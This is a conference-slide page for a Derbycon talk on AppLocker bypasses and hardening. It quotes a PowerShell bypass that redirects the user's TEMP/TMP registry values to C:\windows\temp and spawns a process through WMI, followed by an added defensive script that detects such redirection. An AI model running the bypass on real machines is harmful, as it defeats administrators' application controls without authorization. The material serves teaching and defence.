
App-o-Lockalypse now!



Slides from session at Derbycon 8.0.
Want a good overview of AppLocker and the different AppLocker bypasses, and at the same time learn how defenders can harden their environments to prevent them? Then this is a talk you don't want to miss. It covers a wide range of bypass techniques and shows how to harden AppLocker so that it is even harder to bypass, helping you either start or avoid an App-o-Lockalypse.

Published in: Technology


Slide 1: Can also use Mklink /H

Slide 4 (PowerShell shown on the slide; backslashes restored after extraction stripped them):

    # Save the current per-session TEMP/TMP values so they can be restored afterwards
    $CurrTemp = $env:temp
    $CurrTmp = $env:tmp
    $TEMPBypassPath = "C:\windows\temp"
    $TMPBypassPath = "C:\windows\temp"
    # Point the per-user (HKCU) TEMP/TMP environment values at C:\windows\temp
    Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath"
    Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath"
    # Start a new powershell process through WMI, so it reads the registry-defined
    # environment rather than inheriting this session's variables
    Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "powershell"
    sleep 5
    #Set it back
    Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp
    Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $CurrTemp
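The slide above changes the per-user TEMP/TMP registry values and then launches a fresh process. From the defender's side, the tell-tale is an HKCU\Environment TEMP or TMP that no longer points into the user's profile (here: into C:\windows\temp). The following audit script is an added example, not code from the slides or from the speaker; the function name Test-UserTempRedirect, its parameter, and the sample output format are my own choices.

```powershell
# Added example (not from the slides): report HKCU\Environment TEMP/TMP values that
# have been redirected out of the user profile, as the slide's script does.
function Test-UserTempRedirect {
    param(
        # Registry path holding the per-user environment (default is the real location)
        [string]$RegistryPath = 'HKCU:\Environment'
    )

    $profileRoot = [Environment]::GetFolderPath('UserProfile')
    $windowsRoot = [Environment]::GetFolderPath('Windows')
    $findings    = @()

    foreach ($name in 'TEMP', 'TMP') {
        # Missing value: nothing to report for this name
        $value = (Get-ItemProperty -Path $RegistryPath -Name $name -ErrorAction SilentlyContinue).$name
        if (-not $value) { continue }

        # Expand %USERPROFILE% etc. so the comparison is on a concrete path
        $expanded  = [Environment]::ExpandEnvironmentVariables($value)
        $inProfile = $expanded.StartsWith($profileRoot, [StringComparison]::OrdinalIgnoreCase)
        $inWindows = $expanded.StartsWith($windowsRoot, [StringComparison]::OrdinalIgnoreCase)

        if (-not $inProfile) {
            $findings += [pscustomobject]@{
                Name         = $name
                RawValue     = $value
                ExpandedPath = $expanded
                UnderWindows = $inWindows   # matches the C:\windows\temp case on the slide
                Exists       = Test-Path -LiteralPath $expanded
            }
        }
    }

    return $findings
}

# Usage: prints one row per redirected value; no rows means TEMP/TMP still live in the profile
Test-UserTempRedirect | Format-Table -AutoSize
```

Run it in the context of the user being audited (the HKCU hive is per user); for fleet-wide checks, the same comparison can be applied to each loaded user hive under HKEY_USERS. A result with UnderWindows set to True is worth correlating with process-creation telemetry around the same time, since the slide's script restores the original values after a few seconds and the registry alone may already look clean.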